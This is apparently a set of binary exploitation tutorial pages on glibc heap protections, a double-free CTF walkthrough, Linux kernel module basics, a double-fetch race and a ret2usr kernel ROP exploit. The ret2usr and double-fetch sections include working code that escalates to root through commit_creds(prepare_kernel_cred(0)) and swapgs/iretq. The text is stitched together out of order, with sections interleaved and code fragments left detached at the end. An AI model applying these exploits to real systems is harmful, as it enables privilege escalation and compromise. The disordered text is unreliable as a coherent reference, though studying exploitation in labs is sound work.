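  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)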
Here, pos is the location of the current chunk and ptr the location of the chunk we are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are using ASLR to protect! The >>12 gets rid of the predictable last 12 bits of ASLR, keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are pretty predictable):
It's a very rudimentary protection - we use the current location and the location we point to in order to mangle it. From a programming standpoint, it has virtually no overhead or performance impact. We can see that PROTECT_PTR has been implemented in tcache_put() and in two locations in _int_free() (for fastbins). You can find REVEAL_PTR used as well, wherever the pointers have to be followed again.
So, what does this mean to an attacker?
Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in PROTECT_PTR, and we can easily recreate it to fake our own mangled pointer.
It might be tempting to say that a partial overwrite is still possible, but there is a new security check that comes along with this Safe-Linking mechanism, the alignment check. This check ensures that chunks are 16-byte aligned and is only relevant to singly-linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned in malloc.c will bring up plenty of different locations. The most important ones for us as attackers are probably the one in tcache_get() and the ones in _int_malloc().
When trying to get a chunk e out of the tcache, alignment is checked.
There are three checks here. First on REMOVE_FB, the macro for removing a chunk from a fastbin:
Once on the victim chunk that is about to be returned:
And lastly on every fastbin chunk that gets stashed into the tcache during the same allocation:
_int_free() also checks the alignment when the tcache_entry key is already set to the value it's meant to be and it has to do a whole double-free iteration check.
You may notice some of them use aligned_OK while others use misaligned_chunk.
The macros are defined side-by-side, but really aligned_OK is for addresses while misaligned_chunk is for chunks.
aligned_OK is defined as such:
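A rough version of the relevant macros from malloc.c:
#define MALLOC_ALIGN_MASK  (MALLOC_ALIGNMENT - 1)
#define aligned_OK(m)      (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)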
MALLOC_ALIGNMENT is defined for i386 as 16. In binary that's 10000, so MALLOC_ALIGN_MASK is 1111, meaning the final nibble is checked. This results in 16-byte alignment, as expected.
This alignment check means a forged or partially-overwritten pointer also has to demangle to a 16-byte-aligned address, so even a brute-force of the last 16 bits of a mangled pointer only has a 1/16 chance of passing the check.
The Malloc Maleficarum
The first heap exploits
In 2001, two of the most famous heap exploitation papers were published in Phrack magazine - Vudo malloc tricks and Once upon a free(). These are some of the very first heap exploitation techniques published, covering some of the ones you have read about previously.
In late 2004, glibc was hardened, and this rendered these exploits obsolete. The next famous heap exploitation paper was The Malloc Maleficarum in 2005, which documents a collection of techniques sorted into Houses:
The House of Prime
The House of Mind
The House of Force
The House of Lore
The House of Spirit
The House of Chaos
Each of these had its own unique spin. In keeping with this tradition, modern heap exploits are often nicknamed as their own House, such as the House of Einherjar.
The original houses are the cornerstone of modern heap exploitation, and while they're no longer possible, they were until more recently than you'd think. They are also important to understand to build up your knowledge.
Double-Free Exploit
We are still on Xenial Xerus, which means both of the checks mentioned are still relevant. The bypass for the second check (malloc() memory corruption) is given to you in the form of fake metadata already set to a suitable size. Let's check the relevant parts of the source.
The fakemetadata variable is the fake size of 0x30, so you can focus on the double-free itself rather than the protection bypass. Directly after this is the admin variable, meaning if you pull the exploit off into the location of that fake metadata, you can just overwrite that as proof.
users is a list of strings for the usernames, and userCount keeps track of the length of the array.
main_loop()
Prompts for input, takes in input. Note that main() itself prints out the location of fakemetadata, so we don't have to mess around with that at all.
createUser()
createUser() allocates a chunk of size 0x20 on the heap (real size is 0x30 including metadata, hence the fakemetadata being 0x30) then sets the array entry as a pointer to that chunk. Input then gets written there.
deleteUser()
Get index, print out the details and free() it. Easy peasy.
complete_level()
Checks you overwrote admin with admin, if you did, mission accomplished!
Exploitation
There's literally no checks in place so we have a plethora of options available, but this tutorial is about using a double-free, so we'll use that.
Setup
First let's make a skeleton of a script, along with some helper functions:
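Something along these lines works as a starting point - the ">> " prompt comes from the source shown later, while the binary name and the exact prompts inside each option are assumptions:
from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

def create(data):
    p.sendlineafter('>> ', '1')
    p.sendline(data)

def delete(index):
    p.sendlineafter('>> ', '2')
    p.sendline(str(index))

def complete():
    p.sendlineafter('>> ', '3')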
Finding the Double-Free
As we know with the fasttop protection, we can't allocate once then free twice - we'll have to free once inbetween.
Let's check the progression of the fastbin by adding a pause() after every delete(), hooking on with radare2 at each pause.
delete(0) #1
Due to its size, the chunk will go into Fastbin 2, which we can check the contents of using dmhf 2 (dmhf analyses fastbins, and we can specify number 2).
Looks like the first chunk is located at 0xd58000. Let's keep going.
delete(1)
The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being located at 0xd58030.
delete(0) #2
Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is nice enough to point out there's a double-free.
Writing to the Fastbin Freelist
Now we have a double-free, let's allocate Chunk 0 again and put some random data in. Because it's also considered free, the data we write is seen as being in the fd pointer of the chunk. Remember, the heap saves space, so fd when free is located exactly where the data is when allocated (probably explained better earlier).
So let's write to fd, and see what happens to the fastbin. Remove all the pause() instructions.
Run, debug, and dmhf 2.
The last free() gets reused, and our "fake" fastbin location is in the list. Beautiful.
Let's push it to the top of the list by creating two more irrelevant users. We can also parse the fakemetadata location at the beginning of the exploit chain.
The reason we have to subtract 8 off fakemetadata is that the only thing we faked in the source is the size field, but prev_size is at the very front of the chunk metadata. If we point the fastbin freelist at the fakemetadata variable it'll interpret it as prev_size and the 8 bytes afterwards as size, so we shift it all back 8 to align it correctly.
Now we can control where we write, and we know where to write to.
Getting the Arbitrary Write
First, let's replace the location we write to with where we want to:
Now let's finish it off by creating another user. Since we control the fastbin, this user gets written to the location of our fake metadata, giving us an almost arbitrary write.
The 8 null bytes are padding. If you read the source, you notice the metadata string is 16 bytes long rather than 8, so we need 8 more padding.
Awesome - we completed the level!
Final Exploit
32-bit
Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try it yourself :)
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow here, and I recommend it highly.
Kernel Modules
Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific kernel version (which can be checked with uname -r; my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often exposed under /dev/ or /proc/. There are 3 main module types: Char, Block and Network.
Char Modules
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they're virtually dynamic files (at a super basic level), as the values read and written can be changed.
Examples of Char modules include /dev/random.
I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!
Kernel ROP - Stack Pivoting
While the kernel cannot execute code in userland, it can set its RSP to a userland location, so it is possible to stack pivot to userland as long as all of the gadgets used are in kernel space.
I don't think an example is necessary for this.
#include <stdio.h>
#include <stdlib.h>
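// note: this is the bypass for the "double free or corruption (fasttop)" check -
// freeing a different chunk (b) in between the two frees of a dodges it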
int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);
free(a);
free(b);
free(a);
return 1;
}
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space, and it does this based on the User/Supervisor bit in page tables. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the kernel by controlling the respective QEMU flag (the qemu64 CPU model itself is nothing special):
-cpu qemu64,+smep
Sometimes it will be enabled by default, in which case you need to use nosmep.
For reference, this is the double-free iteration check that _int_free() performs when the tcache_entry key is already set to the value it's meant to be:
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next))
{
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
Exposing it to the File System
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.
Note that on an error it calls class_destroy and unregister_chrdev:
Cleaning it Up
These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:
Controlling I/O
In intro_init, the first line may have been confusing:
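It's the call that registers the char device - something like this, where the device name is an assumption:
major = register_chrdev(0, "intro", &fops);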
The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:
The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read() function itself:
We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!
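Put together, a minimal sketch of the handler and the file_operations struct might look like this (the QWERTY message and names follow the description above):
#include <linux/fs.h>
#include <linux/module.h>
#include <linux/uaccess.h>

static ssize_t intro_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
{
    char message[] = "QWERTY";

    if (copy_to_user(buf, message, sizeof(message)))   /* copy into the userspace buffer */
        return -EFAULT;
    return sizeof(message);
}

static struct file_operations fops = {
    .owner = THIS_MODULE,
    .read  = intro_read,
};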
Full Code
Simply use sudo insmod to load it.
Testing The Module
Create a really basic exploit.c:
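Something along these lines (the device path matches the /dev/intro name used earlier):
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main() {
    char buffer[7] = {0};

    int fd = open("/dev/intro", O_RDONLY);
    read(fd, buffer, 6);
    printf("Read: %s\n", buffer);

    close(fd);
    return 0;
}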
If the module is successfully loaded, the read() call should read QWERTY into buffer:
Success!
Writing a Char Module
The Code
Writing a Char Module is surprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note we put the parameters as void; this is because kernel modules are very picky about functions having explicitly-declared parameters (even if just void).
We then register the purposes of the functions using module_init() and module_exit().
Note that we use printk rather than printf. GLIBC doesn't exist in kernel mode; instead we use the kernel's own printing functionality. KERN_ALERT specifies the type of message sent, and there are several other log levels.
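A minimal sketch of the module described above (the exact message strings are illustrative):
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>

MODULE_LICENSE("GPL");

static int __init intro_init(void) {
    printk(KERN_ALERT "Module loaded!\n");
    return 0;
}

static void __exit intro_exit(void) {
    printk(KERN_ALERT "Module unloaded!\n");
}

module_init(intro_init);
module_exit(intro_exit);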
Compiling
Compiling a Kernel Object can seem a little more complex as we use a Makefile, but it's surprisingly simple:
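A typical module Makefile looks something like this, assuming the source file is called intro.c:
obj-m += intro.o

all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean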
$(MAKE) is a special flag that effectively calls make, but it propagates all the same flags that our Makefile was called with. So, for example, if we call make -j 8
Then $(MAKE) will become make -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is unique per kernel, which is why the compiling process uses your kernel's own build directory.
Using the Kernel Module
Now we've got a ko file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg.
Here we grab the last line using tail - as you can see, our printk is called!
Now let's unload the module:
And there our intro_exit is called.
You can view currently loaded modules using the lsmod command
Tcache Keys
A primitive double-free protection
Starting from glibc 2.29, the tcache was hardened by the addition of a second field in the tcache_entry struct, the key:
It's a pointer to a tcache_perthread_struct. In the tcache_put() function, we can see what key is set to:
When a chunk is freed and tcache_put() is called on it, the key field is set to the location of the tcache_perthread_struct. Why is this relevant? Let's check the tcache security checks in _int_free():
The chunk being freed is variable e. We can see here that before tcache_put() is called on it, there is a check being done:
The check determines whether the key field of the chunk e is set to the address of the tcache_perthread_struct already. Remember that this happens when it is put into the tcache with tcache_put()! If the pointer is already there, there is a very high chance that it's because the chunk has already been freed, in which case it's a double-free!
It's not a 100% guaranteed double-free though - as the comment above it says:
This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting.
There is a 1/2^<size_t> chance that the key being tcache_perthread_struct already is a coincidence. To verify, it simply iterates through the tcache bin and compares the chunks to the one being freed:
Iterates through each entry, calls it tmp and compares it to e. If equal, it detected a double-free.
You can think of the key as an effectively random value (due to ASLR) that gets checked against, and if it's the correct value then something is suspicious.
So, what can we do against this? Well, this protection doesn't affect us that much - it stops a simple double-free, but if we have any kind of UAF primitive we can easily overwrite e->key. Even with a single byte, we still have a 255/256 chance of overwriting it to something that doesn't match key. Creating fake tcache chunks doesn't matter either, as even in the latest glibc version there is no equivalent check of the key on allocation, meaning tcache poisoning is still doable.
In fact, the key can even be helpful for us - the fd pointer of the tcache chunk is mangled, so a UAF does not guarantee a heap leak. The key field is not mangled, so if we can leak the location of tcache_perthread_struct instead, this gives us a heap leak as it is always located at heap_base + 0x10.
In glibc 2.34, the key field was changed. Instead of tcache_put() setting key to the location of the tcache_perthread_struct, it sets it to tcache_key:
Note the change of the key field's type as well!
What is tcache_key? It's defined and set directly below, in the tcache_key_initialize() function:
It attempts to call __getrandom(), which for Linux is a thin wrapper that just uses a syscall to read n random bytes. If that fails for some reason, it calls the random_bits() function instead, which generates a pseudo-random number seeded by the time. Long story short: tcache_key is random. The check in _int_free() stays the same, and the operation is the same - it's just compared against a completely random value rather than one based on ASLR. As the comment above it says
The value of tcache_key does not really have to be a cryptographically secure random number. It only needs to be arbitrary enough so that it does not collide with values present in applications. [...]
This isn't a huge change - it's still only straight double-frees that are affected. We can no longer leak the heap via the key, however.
Interactivity with IOCTL
A more useful way to interact with the driver
Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
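For example, a sketch of a driver-side handler (the names and command values are illustrative):
static long intro_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    switch (cmd) {
    case 0x1337:
        printk(KERN_INFO "ioctl called with arg 0x%lx\n", arg);
        break;
    default:
        return -EINVAL;
    }
    return 0;
}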
But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:
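From userspace it's just a syscall on the open file descriptor - a sketch, with the device path and values assumed:
#include <fcntl.h>
#include <sys/ioctl.h>

int main() {
    int fd = open("/dev/intro", O_RDWR);
    ioctl(fd, 0x1337, 0xdeadbeef);
    return 0;
}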
And you would have to update the file_operations struct:
On modern Linux kernel versions, .ioctl has been removed from file_operations in favour of .unlocked_ioctl and .compat_ioctl. The former is the replacement for .ioctl, with the latter allowing 32-bit processes to perform ioctl calls on 64-bit systems. As a result, the new file_operations is likely to look more like this:
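A sketch, reusing the handler from above:
static struct file_operations fops = {
    .unlocked_ioctl = intro_ioctl,
    .compat_ioctl   = intro_ioctl,
};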
The Ultimate Aim of Kernel Exploitation - Process Credentials
Overview
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped as root.
To understand this, we have to talk a little about how privileges and credentials work in Linux.
The cred struct
The cred struct contains all the permissions a task holds. The ones that we care about are typically these:
These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
Note the __randomize_layout here at the end! This is a compiler flag that tells it to mix the layout up on each load, making it harder to target the structure!
task_struct
The kernel needs to store information about each running task, and to do this it uses the task_struct structure. Each kernel task has its own instance.
The task_struct instances are stored in a linked list, with a global kernel variable init_task pointing to the first one. Each task_struct then points to the next.
Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained in the kernel source:
In effect, real_cred is the initial credential of the process, and is used by processes acting on the process. cred is the current credential, used to define what the process is allowed to do. We have to keep track of both as some processes care about the initial cred and some about the updated.
An example of caring about real_cred instead of cred is the implementation of /proc/$PID/status, which displays the real_cred as the owner of a process, even if privileges are elevated (note that task_uid() is a macro that, confusingly, grabs from real_cred). Conversely, setuid executables will modify cred and not real_cred.
So, which set of credentials do we want to target with an arbitrary write? It will depend on what the credentials are used for, but since you usually want to be creating new processes (through system or execve), cred is the one that gets used. In some cases, real_cred will work too, because the two pointers often refer to the same struct (though note that this is not guaranteed, so it could differ for new process creation).
prepare_kernel_cred() and commit_creds()
As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.
prepare_kernel_cred()
The function can be found in kernel/cred.c, but there's not much to say - it creates a new cred struct called new and fills it in based on the task passed as an argument. It returns new.
If NULL is passed as the argument, it will base new on init_cred, the credential set of the initial task - in other words, root credentials. This is very important, as it means that calling prepare_kernel_cred(0) results in a new set of root creds!
This last part is different on newer kernel versions - check out the later section on that!
commit_creds()
This function is also found in kernel/cred.c, but ultimately it will update task->real_cred and task->cred to the new credentials:
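Putting the two together gives the classic escalation payload used throughout kernel exploitation (on older kernels, where passing NULL still yields root creds):
commit_creds(prepare_kernel_cred(NULL));   /* must be executed in kernel context */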
Resources and References
Double-Fetch
The most simple of vulnerabilities
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
A Vulnerable Kernel Module
Let's start with a convoluted example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.
The code below will be the contents of the read() function of a kernel module. I've removed some of the surrounding boilerplate, but here are the relevant parts:
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Set the module's stored id to the value we passed in
Simple Communication
Let's say we want to communicate with the module, and we set up a simple C program to do so:
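A sketch of such a program - the device path, the struct layout and the use of write() to hand over a pointer to the struct are assumptions that match the description below:
#include <fcntl.h>
#include <unistd.h>

struct Credentials {
    int id;
};

int main() {
    struct Credentials creds = { .id = 900 };

    int fd = open("/dev/double_fetch", O_RDWR);
    write(fd, &creds, sizeof(creds));    /* the kernel receives a *pointer* to our struct */

    close(fd);
    return 0;
}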
We compile this statically (as there are no shared libraries on our VM):
As expected, the id variable gets set to 900 - we can check this in dmesg:
That all works fine.
Exploiting a Double-Fetch and Switching to ID 0
The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):
And once more, to set the id variable:
Again, this might seem fine - but it's not. What is stopping it from changing in between these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
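Condensed, the vulnerable pattern described above looks something like this (a sketch; the struct and variable names follow the description):
struct Credentials *creds = (struct Credentials *)buf;   /* buf is a userspace pointer */

if (creds->id == 0)          /* first fetch: the security check */
    return -EINVAL;

ssleep(1);                   /* the (artificial) window */

id = creds->id;              /* second fetch: the use - the value may have changed to 0! */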
A Proof-of-Concept: Switching to ID 0
In between the two dereferences of creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race condition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we will have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id.
If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we move onto part 2, with no sleep, we require multiple cores.
The C program will hang on write until the kernel module returns, so we can't use the main thread.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!
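A sketch of that exploit - device path, struct layout and timings as assumed above:
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>

struct Credentials {
    int id;
};

struct Credentials creds = { .id = 900 };

void *swap_id(void *arg) {
    usleep(300000);          /* wait 0.3 seconds - inside the module's sleep window */
    creds.id = 0;            /* swap the id between the two fetches */
    return NULL;
}

int main() {
    pthread_t t;
    int fd = open("/dev/double_fetch", O_RDWR);

    pthread_create(&t, NULL, swap_id, NULL);
    write(fd, &creds, sizeof(creds));    /* hangs until the module returns */
    pthread_join(t, NULL);

    close(fd);
    return 0;
}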
We have to compile it statically, as the VM has no shared libraries.
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):
Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:
Use the newly-created initramfs.cpio to launch the VM with run.sh. Executing exploit, it is successful!
Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.
Kernel ROP - ret2usr
ROPpety boppety, but now in the kernel
Introduction
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.
Vulnerable Module
Note that the kernel version here is 6.1, due to some modifications we will discuss later.
The relevant code is here:
As we can see, it's a 0x100-byte memcpy into a 0x20-byte buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by the compiler and the entire function just becomes xor eax, eax; ret!
Exploitation
Assembly to escalate privileges
Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.
For obvious reasons, you require root permissions to read this file!
Now we know the locations of the two important functions. After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):
Then we call commit_creds() on the result (which is stored in RAX):
We can throw this directly into the C code using inline assembly:
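A sketch of what that can look like - the two addresses stand in for the ones read from /proc/kallsyms and are illustrative here (the return back to userland is added further down):
void escalate(void) {
    __asm__(
        ".intel_syntax noprefix;"
        "movabs rax, 0xffffffff814c67f0;"    /* prepare_kernel_cred (illustrative address) */
        "xor rdi, rdi;"                      /* first argument: 0 / NULL */
        "call rax;"
        "mov rdi, rax;"                      /* pass the returned cred struct */
        "movabs rax, 0xffffffff814c6410;"    /* commit_creds (illustrative address) */
        "call rax;"
        ".att_syntax;"
    );
}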
Overflow
The next step is overflowing. The 7th qword overwrites RIP:
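A sketch of the overflow itself, assuming the module is reached with a plain write() on an open file descriptor:
unsigned long payload[7];
memset(payload, 0x41, sizeof(payload));        /* junk for the buffer and saved registers */
payload[6] = (unsigned long)escalate;          /* the 7th qword lands on the saved return address */
write(fd, payload, sizeof(payload));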
Finally, we create a get_shell() function we call at the end, once we've escalated privileges:
Returning to userland
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug.
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state at the start of the program's execution, then once we have escalated privileges in kernel mode, we restore the registers to swap back to user mode. This reverts execution to the exact state it was in before we ever entered kernel mode!
We can store them as follows:
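A sketch of the saving routine, called right at the start of main() while we are still in user mode (the variable names here are my own convention):

unsigned long user_cs, user_ss, user_sp, user_rflags;
unsigned long user_rip = (unsigned long)get_shell;   // where we want to land afterwards

void save_state(void) {
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}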
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate() for after the privileges are acquired:
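Roughly, something like this gets appended to the end of the inline assembly block in escalate():

        // appended after the call to commit_creds
        "swapgs;"               // restore the userland GS base
        "mov r15, user_ss;"
        "push r15;"             // SS
        "mov r15, user_sp;"
        "push r15;"             // RSP
        "mov r15, user_rflags;"
        "push r15;"             // RFLAGS
        "mov r15, user_cs;"
        "push r15;"             // CS
        "mov r15, user_rip;"
        "push r15;"             // RIP (get_shell)
        "iretq;"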
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.
If we compile it statically and load it into the initramfs.cpio, notice that our privileges are elevated!
We have successfully exploited a ret2usr!
Understanding the restoration
How exactly does the above assembly code restore the registers, and why does it return us to user space? To understand this, we have to know what swapgs and iretq actually do when the CPU switches between user and kernel mode.
The swapgs instruction exchanges the current GS base register value with a value stored in one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs enables the kernel to obtain a pointer to its own data structures.
GS - has to swap back to the user space value
SS - Stack Segment
GS is changed back via the swapgs instruction. All the others are changed back via iretq, the QWORD variant of the iret family of Intel instructions. The intent behind iretq is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer's Manual:
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.
Final Exploit
The final version
$ r2 -d -A heap1 AAAA BBBB
$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0 e8fbfdffff call sym.imp.puts
char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "wrong size" error
char admin[0x10] = "Nuh-huh\0";
// List of users to keep track of
char *users[15];
int userCount = 0;
void main_loop() {
while(1) {
printf(">> ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
switch (choice)
{
case 1:
createUser();
break;
case 2:
deleteUser();
break;
case 3:
complete_level();
default:
break;
}
}
}
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif
KASLR
KASLR is the kernel version of ASLR, randomizing various parts of kernel space to make exploitation more complicated (in the exact same way regular ASLR does for userspace exploitation).
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
tcache_entry *tmp;
